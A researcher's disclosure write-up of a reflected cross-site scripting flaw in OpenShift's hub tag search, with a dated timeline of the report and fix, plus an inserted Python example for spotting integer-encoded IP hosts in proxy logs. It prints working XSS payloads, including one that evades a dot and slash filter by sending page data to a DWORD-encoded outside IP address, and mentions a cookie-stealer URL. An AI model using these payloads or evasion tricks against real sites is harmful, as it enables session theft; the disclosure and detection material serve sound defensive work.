Reflective XSS in OpenShift by RedHat

OpenShift is an Open Hybrid Cloud Application Platform by Red Hat that allows developers to quickly develop, host, and scale applications in a cloud environment.

I have found a very simple reflective Cross-Site Scripting vulnerability on https://hub.openshift.com. The tag search function did not filter input at all, so it was possible to display user cookies like this:

https://hub.openshift.com/quickstarts/tags/<svg onload=alert(cookie)>

It soon turned out that stealing cookies is not so easy, because using a dot char (“.”) or a forward slash (“/” or “%2f”) resulted in an application error. No https://lubi.cz/cookie.php?c=document.cookie for me this time…

Furthermore, the lack of a dot character meant that I could use neither an IP address nor a file extension for cookie exfiltration. Even worse, no “http://” or “//” scheme either. But let’s take another look at the XSS Filter Evasion Cheat Sheet.

DWORD encoding to the rescue!

  1. Take an IP address (Google.com – 216.58.209.78) and convert it to decimal (3627733326).
  2. Set your cookie stealer at your IP address (I used “google.com/?q=” for that).
  3. Create a payload without a dot char (“.”) or a forward slash (“/” or “%2f”). Only Firefox allowed me to use the “http:” scheme with those restrictions. Ladies and Gentlemen, please welcome:

https://hub.openshift.com/quickstarts/tags/<img src=x onerror="location='http:3627733326'+'%3fq='+domain">
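The DWORD trick above is worth being able to recognise on the defending side, since a bare-integer host is rare in legitimate browser traffic. The following is an added example (mine, not code from the post or from Red Hat) that converts between the dotted-quad and DWORD forms, extracts the host from URLs including the scheme-without-slashes form the post mentions, and scans a few constructed proxy-log lines for numeric hosts. It goes slightly beyond the post by also decoding 0x-prefixed hex and 0-prefixed octal spellings, which browsers accept in the same way; the log lines, timestamps and field layout are constructed for the example.

```python
"""Added example (not from the original post): normalise numeric IP hosts.

The post shows an exfiltration URL whose host is a DWORD-encoded IPv4
address (216.58.209.78 -> 3627733326) so that no dot or slash is needed.
The helpers below convert between the two forms and scan constructed
proxy-log lines for URLs whose host is written as a bare integer.
"""
import ipaddress
import re
from typing import List, Optional, Tuple

# Scheme is optional, "//" is optional (Firefox accepted "http:3627733326"),
# and the host ends at the first "/", "?", "#", ":" or end of string.
_HOST_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?(?://)?([^/?#:]+)", re.I)


def ip_to_dword(dotted: str) -> int:
    """'216.58.209.78' -> 3627733326 (the form used in the post's payload)."""
    return int(ipaddress.IPv4Address(dotted))


def dword_to_ip(value: int) -> str:
    """3627733326 -> '216.58.209.78'."""
    return str(ipaddress.IPv4Address(value))


def extract_host(url: str) -> Optional[str]:
    """Return the host part of a URL, tolerating the scheme-without-slashes form."""
    m = _HOST_RE.match(url.strip())
    return m.group(1) if m else None


def decode_numeric_host(host: str) -> Optional[str]:
    """Map a host written as one whole integer to dotted-quad, else None.

    Handles decimal (DWORD), 0x-prefixed hex and 0-prefixed octal spellings;
    hostnames and already-dotted addresses return None. Hex and octal go
    beyond the post, which only uses the decimal form.
    """
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", host):
        value = int(host, 16)
    elif re.fullmatch(r"0[0-7]+", host):
        value = int(host, 8)
    elif host.isdigit():
        value = int(host, 10)
    else:
        return None
    if value > 0xFFFFFFFF:  # wider than 32 bits cannot be an IPv4 address
        return None
    return dword_to_ip(value)


# Constructed proxy-log lines (timestamp, method, URL, status); not real data.
SAMPLE_PROXY_LOG = """\
2015-05-19T10:00:01Z GET https://hub.openshift.com/quickstarts/tags/java 200
2015-05-19T10:00:02Z GET http:3627733326?q=hub.openshift.com 302
2015-05-19T10:00:03Z GET http://0xd83ad14e/?q=hub.openshift.com 200
2015-05-19T10:00:04Z GET https://www.google.com/?q=openshift 200
"""


def find_numeric_hosts(log_text: str) -> List[Tuple[str, str]]:
    """Return (raw host, decoded dotted-quad) for every request whose URL host
    is a bare integer in any supported spelling."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue  # malformed line, skip rather than guess
        host = extract_host(fields[2])
        decoded = decode_numeric_host(host) if host else None
        if decoded:
            hits.append((host, decoded))
    return hits


if __name__ == "__main__":
    print(ip_to_dword("216.58.209.78"))  # 3627733326
    for raw, ip in find_numeric_hosts(SAMPLE_PROXY_LOG):
        print(f"numeric host {raw!r} -> {ip}")
```

Running the script flags the two constructed requests whose host is `3627733326` and `0xd83ad14e`, both resolving to 216.58.209.78, while the hostname-based requests pass through untouched. The same normalisation is useful before comparing egress destinations against an allow-list, since a list keyed on dotted-quad strings would otherwise miss the integer spellings.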

didijustwin

[19th May 2015] - bug was reported
[25th August 2015] - another contact, no response
[2nd September 2015] - RedHat's response
[3rd September 2015] - partial fix
[7th October 2015] - bug was resolved
